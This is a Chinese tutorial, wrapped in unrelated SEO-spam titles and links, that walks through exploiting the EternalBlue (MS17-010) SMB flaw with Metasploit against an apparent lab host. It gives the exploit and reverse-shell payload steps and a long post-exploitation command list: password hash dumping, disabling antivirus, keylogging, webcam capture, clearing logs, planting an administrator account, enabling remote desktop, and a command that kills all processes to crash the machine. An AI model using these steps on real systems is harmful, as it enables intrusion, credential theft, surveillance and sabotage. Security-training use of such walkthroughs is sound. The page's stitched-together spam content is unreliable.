当前位置: 首页 > news >正文

网站做地区定位跳转wordpress 阿里短信

网站做地区定位跳转,wordpress 阿里短信,网站建设实施流程图,南京网站制作费用文章目录 永恒之蓝 ms 17_0101.漏洞介绍1.1 影响版本1.2 漏洞原理 2.信息收集2.1 主机扫描2.2 端口扫描 3. 漏洞探测4. 漏洞利用5.后渗透阶段5.1创建新的管理员账户5.2开启远程桌面5.3蓝屏攻击 永恒之蓝 ms 17_010 1.漏洞介绍 永恒之蓝#xff08;ms17-010#xff09;爆发于… 文章目录 永恒之蓝 ms 17_0101.漏洞介绍1.1 影响版本1.2 漏洞原理 2.信息收集2.1 主机扫描2.2 端口扫描 3. 漏洞探测4. 漏洞利用5.后渗透阶段5.1创建新的管理员账户5.2开启远程桌面5.3蓝屏攻击 永恒之蓝 ms 17_010 1.漏洞介绍 永恒之蓝ms17-010爆发于2017年4月14日晚是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限以此来控制被入侵的计算机。甚至于2017年5月12日 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒使全世界大范围内遭受了该勒索病毒甚至波及到学校、大型企业、政府等机构只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 1.1 影响版本 目前已知受影响的 Windows 版本包括但不限于WindowsNTWindows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。 1.2 漏洞原理 通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出最终导致任意命令的执行。在Windows操作系统中SMB服务默认是开启的监听端口默认为445因此该漏洞造成的影响极大。 2.信息收集 2.1 主机扫描 arp-scan -l2.2 端口扫描 nmap -O -sS -T4 192.168.160.52说明 -O这个选项告诉Nmap进行操作系统识别。它会尝试通过分析目标主机的网络行为和响应来猜测其运行的操作系统类型。-sS这个选项启用了TCP SYN扫描也称为半开放扫描。在进行端口扫描时Nmap发送一个TCP SYN包到目标主机上的每个目标端口如果收到了一个SYN/ACK响应说明该端口是打开的。-T4这个选项设置了扫描的速度/时间模板。T4是Nmap的默认设置之一表示较高的扫描速度和更少的等待时间。 3. 漏洞探测 msfconsole # 搜寻模块 search ms17-010# 使用第三个模块 use 3 # 查看该漏洞模块的具体介绍信息 infoshow missing # 查看需要配置哪些信息这里需要配置远程主机的IP地址也就是靶机的IP地址。 set rhosts 192.168.160.52使用show options选项查看我们要输入的具体参数其中标注了yes的选项是必须的参数若这个参数为空则需要我们填写。 show options 开始攻击 run显示该主机很可能能够会受到永恒之蓝漏洞的攻击。 4. 漏洞利用 search ms17-010设置payload连接的方式reverse_tcp为反向连接即受害机主动连接攻击机以获取shell。 set payload windows/x64/meterpreter/reverse_tcp设置攻击目标 set rhosts 192.168.160.52 run拿下该主机的shell执行cmd命令。 在这里可以进行文件上传下载获取截屏获取密码使用摄像头拍照后门持久化等操作。 5.后渗透阶段 运行了run(exploit)命令之后我们开启了一个reverse TCP监听器来监听本地的 4444 端口即攻击者的本地主机地址LHOST和端口号LPORT。 在meterpreter 中我们可以使用以下的命令来实现对目标的操作 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 hashdump #导出密码的哈希 load kiwi #加载 ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程 PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u hack -p 123 #创建hack用户密码为123 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 clearev #清除日志示例 查看主机系统信息 sysinfo查看IP地址信息 ipconfig查看用户身份 getuid获得shell控制台 shell如果乱码受不了的话输入chcp 65001 即可 下面的模块主要用于在取得目标主机系统远程控制权后进行一系列的后渗透攻击动作。 run post/windows/manage/migrate #自动进程迁移 run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 run post/windows/manage/killav #关闭杀毒软件 run post/windows/manage/enable_rdp #开启远程桌面服务 run post/windows/manage/autoroute #查看路由信息 run post/windows/gather/enum_logged_on_users #列举当前登录的用户 run post/windows/gather/enum_applications #列举应用程序 run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码 run windows/gather/smart_hashdump #dump出所有用户的hash示例 获取用户密码 run windows/gather/smart_hashdump 或者 hashdump5.1创建新的管理员账户 进入shell控制台 在目标主机上创建一个名为ghui的用户密码为123456 将ghui加入到windows 7的本地管理员组中以便获得更大权限 net localgroup administrators ghui /add查看本地用户 net user查看本地管理员 net localgroup administrators可以看到ghui已经被添加到windows管理员组中。 5.2开启远程桌面 运用getuid脚本开启目标主机远程桌面 run getgui -e或者run post/windows/manage/enable_rdp在kali终端输入 rdesktop 192.168.160.52选择其他用户 登录之前创建得ghui用户密码123456 5.3蓝屏攻击 最后一步让它蓝屏 taskkill /f /fi pid ne 1解释 taskkill 用于终止运行中的进程表示杀进程。 /f 是一个参数表示强制终止进程。 /fi 是一个参数用于指定进程过滤器filter。 pid ne 1 是一个过滤器表达式用于筛选进程。在这个例子中pid 代表进程的 IDPIDne 表示不等于1 是要排除的进程 ID。换句话说这个命令会终止除了进程 ID 为 1通常是系统进程之外的所有进程。 执行结果
http://www.hkea.cn/news/14436376/

相关文章:

  • 品牌网站建设3a小蝌蚪东莞事件最新消息新闻
  • 企业网站的购买方式wordpress设置密码
  • 网站建设亿码酷出名5城阳网站建设公司
  • 付费阅读插件wordpress网站做优化一般几个字
  • php 企业网站系统下载个人网站模板之家
  • 网站如何做词网站建设都用什么软件
  • 精品课程网站建设内容wordpress 爱无
  • 大气环保网站模板马化腾称视频号是全公司希望
  • 网站做点击收费标准中国包装创意设计大赛
  • 网站访问大小 计算流量全国企业信息公示查询系统官网
  • 哈尔滨网站建设有限公司网站做外链是什么意思
  • 外文网站制作地推的60种方法
  • 广西网站建设产品优化怎么做网站教程++用的工具
  • 寻找企业网站建设通辽市做网站公司
  • 网站开发框架 知乎dyndns免费域名
  • 外国人做外贸都会浏览哪些网站wordpress主题视频
  • 手机网站安全证书过期怎么处理哪些企业网站做得好
  • 营销型网站如何建设郑州新一网站建设
  • 网站名和域名的区别wordpress标题设置方法
  • e点互动网站江苏省工程建设标准网站
  • 做营销推广外包的网站图片压缩wordpress
  • 芦苞网站建设捡个校花做老婆是哪个网站的
  • 重庆做网站优化wordpress相册样式
  • 事业单位网站建设方案策划书wordpress 缩短网址
  • 百度站长工具添加不了站点外贸购物网站建站
  • 电子商务网站设计原则的第一要素是wordpress 做的人多吗?
  • 广西网站运营驾校网站模板
  • 手机测评做视频网站网站推广教程优化整站
  • 昊诺网站建设wordpress 社交图标
  • 营销型网站的名词解释帮别人做网站备案